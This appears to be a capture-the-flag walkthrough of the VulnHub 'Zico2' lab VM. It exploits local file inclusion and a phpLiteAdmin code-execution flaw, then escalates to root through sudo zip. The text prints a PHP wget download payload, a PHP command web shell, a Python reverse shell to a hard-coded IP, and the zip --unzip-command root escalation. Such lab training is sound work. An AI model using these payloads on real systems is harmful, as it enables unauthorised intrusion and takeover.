In this article, we will learn to solve another Capture the Flag (CTF) challenge which was posted on VulnHub by Rafael. As you may know from previous articles, Vulnhub.com is a platform which provides vulnerable applications/machines for a practical, hands-on experience in conducting pen testing applications.

You can check previous articles for more related CTF challenges. The VM which will be exploited in this article is named as “Zico2” on the VulnHub website. The link to download the VM and run in in a VirtualBox is as follows:

https://download.vulnhub.com/zico/zico2.ova

The torrent download URL is also available for this VM, which is given in the reference section of this article. For those who are not aware of the site, VulnHub is a well-known website for security researchers which provides users with a method to learn and practice their hacking skills through a series of challenges in a safe, and legal environment.

The objective of this challenge is to gain the root access and read the flag file. It is important to note that this VM will work only on VirtualBox.

Step 1:

To get started, the first step is always to find out what the ports and services are available on the target machine. The Nmap full port scan is used for this specific purpose. This is illustrated in the screenshot below:

The above screenshot demonstrates that 3 ports are listed as OPEN by the Nmap scan.

Step 2:

As port 80 is opened, so is also the IP on the web browser. From there, a website becomes available. You can see it in the following screenshot:

Next, I start looking for vulnerabilities in this application. While exploring, I found an interesting parameter which takes the HTML file as an input and runs it onto the web browser. As a result, I started to look for the various vulnerabilities in this parameter and identified that it is now prone to the Local File Inclusion (LFI). I extracted the password file from the target machine through from this parameter. It can be seen in the screenshot below:

After analyzing the contents of this file, I could see that are some users on the target machine which have the bash (shell) access. Because of this, I tried to log in as one of these users by using the various default passwords. However, this technique did not work.

Next, I decided to run the ‘Dirb’ tool to find any other entry points on the target system. The output of Dirb can be seen in the following screenshot.

Through the output of Dirb, more entry points were discovered. I started with dbadmin. I next opened up the “‘/dbadmin/” directory on the web browser.

The file had a directory listing enabled, and there was a test file in it. It was clicked on and it opened the ‘PhpLiteAdmin’ login page on the web browser. To login into it, only one password was required. It can be seen in the following screenshot:

The file appears to be an outdated version. I tried the default password admin and it was correct. I could successfully login into the database. To start the search for new exploits on Google, “phpliteadmin” was given as the search string. The very first result on Google shows that this version is prone to a remote code execution vulnerability. This is demonstrated in the screenshot below:

I read this on the exploit Db website. It appeared to be more like a process instead of an automated script. Next, I started following it in a step by step fashion as it was given in the exploit. I then created a database with the extension of “php”. It can be seen in the following screenshot:


As it is demonstrated in the above screenshot, the database created by me is entitled the “hehe.php” database. The full path of the database can be seen in the same window.

As per the exploit process, I next created a new table with one field and clicked on “Go.”

After execution, the application was then redirected to another page. It asked me to enter the field name and a default value. So, I added “Any Name” in the first field and made sure that it was an integer type. The PHP code was entered as the default value. This process is demonstrated in the following screenshot:

Next, I clicked on “Create,” and it created a database table with the given details, as illustrated below:

In the above steps, I have identified the Local File Inclusion (LFI) in the application. Next, I created a file database with the name of “php extension.” This was included in the vulnerable parameter, as demonstrated below:

As it can be seen in the above screenshot, the code was successfully executed on the target system. Also, we can see the “phpMyAdmin” page on the web browser. This means that whatever code was entered as the default value of the database table is correct, and thus, it will get executed by the target system. Next, a PHP code snippet was written which will run our commands onto the target system, as seen in the screenshot below:

<?php

system (” cd /tmp; wget 192.168.100.105/hehe;”);

?>

This code was added as a table into the database, as can be seen below:

Ethical Hacking Training – Resources (InfoSec)

Before executing the code onto the web browser, it is important to understand how it works. First, it will change the current directory to a “/tmp/” directory. Second, it will then download the file from the host machine onto the target machine in the /tmp/ directory by using the “wget” utility. Third, a “php” shell code will then be added to the “hehe” file, as seen below:

<?php

system ($_GET[‘cmd’]);

?>

This code was then executed, and the web browser output can be seen in the following screenshot:

As this does not create any kind of output onto the web browser, it was assumed that the file would have been generated in the “/tmp/” directory. The “hehe” file was incorporated by using the file inclusion. Next, various commands were executed onto the target system, as can be seen below:

As it can be seen in the screenshot above, the ‘ls’ command has been successfully executed. It means that we can run any commands onto the target machine. So, let us try to run a command which would give the command shell of the target machine. This can be specified as follows:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.61”,3434));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

The above command is used to get the reverse connection onto the target machine.

In the above screenshot, it is demonstrated that we have successfully achieved a reverse connection from the target machine. After that, another command is then executed to get the stage shell onto the target system. This can be seen in the screenshot below:

Command Used: python -c’import pty; pty.spawn(“/bin/sh”)’

The first target has been completed, and as a result, the limited shell access on the target machine has been achieved. However, the CTF challenge was to get to the root access of the VM.

To accomplish this task, I started further exploring the VM for any other entry points. While doing so, I discovered the database credentials in the WordPress configuration file, which can be seen in the below screenshot:

The database username and password can be seen in the area above, which is highlighted in red. I tried the same database password for the user named “ZICO.” The output can be seen in the below screenshot:

As it can be seen, I have successfully logged in as “ZICO.” However, it is still not a root user on the system. So, I started exploring other entry points to discover the root access.

After spending some time, I found an error message that showed various commands which can be run onto the target machine as a root user, without actually using the root password. This is illustrated in the following screenshot:

As it can be in the above screenshot, there are two package commands which can be run as a root user without the need for the actual root password. Thus, I created a small script that utilizes a “give package command.” This gives
the root access to the target system. It can be seen in the screenshot below:

Command Used:

sudo -u root /usr/bin/zip ttt.zip tt.php -T –unzip-command=”sh -c /bin/bash”

Finally, we have achieved gaining the root access to the target system. I then changed the current directory to the root directory and read the flag file as demonstrated in the screenshot below:

So, we finally got the flag. This completes the challenge. Stay tuned for more challenges in future articles.

References: